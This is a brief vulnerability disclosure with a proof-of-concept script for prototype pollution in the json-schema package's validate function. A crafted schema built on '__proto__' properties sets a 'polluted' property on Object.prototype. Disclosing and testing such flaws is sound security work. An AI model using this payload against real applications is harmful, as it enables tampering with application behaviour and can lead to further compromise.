A constructed payload sent to validate
will lead to prototype pollution.
// PoC.js
const { validate } = require("json-schema");
const instance = JSON.parse(`
{
"$schema":{
"type": "object",
"properties":{
"__proto__": {
"type": "object",
"properties":{
"polluted": {
"type": "string",
"default": "polluted"
}
}
}
},
"__proto__": {}
}
}`);
const a = {};
console.log(a.polluted);
validate(instance);
console.log(a.polluted);
This vulnerability is capable of make prototype pollution